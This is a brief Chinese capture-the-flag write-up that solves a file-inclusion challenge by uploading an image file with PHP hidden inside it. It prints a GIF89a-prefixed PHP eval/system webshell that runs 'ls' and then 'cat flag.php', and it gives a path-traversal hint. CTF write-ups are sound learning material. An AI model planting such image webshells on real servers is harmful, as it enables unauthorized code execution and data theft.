What can images do

题目入口http://101.201.126.95:7004
最意想不到的图，做出最超乎想象的事...

做了很久，在队员的指引下，做出来了，感谢

 

 

进入正题，先提交下下面的图片，url出现filename=file1.php&submit=提交,    应该能看出来是道文件包含的题目，

 

 

 

然后上传文件，上传一句话木马，上传失败

 

上传图片马，上传成功，但是菜刀怎样连接都无法连上，怀疑环境被整了

经过同学的点拨，上传图片马进行查看

GIF89a
<?php @eval("system('ls');")?>

查看目录

 

 

 将ls改为cat flag.php,再次上传，  ../不能省略

 

F12查看，flag到手~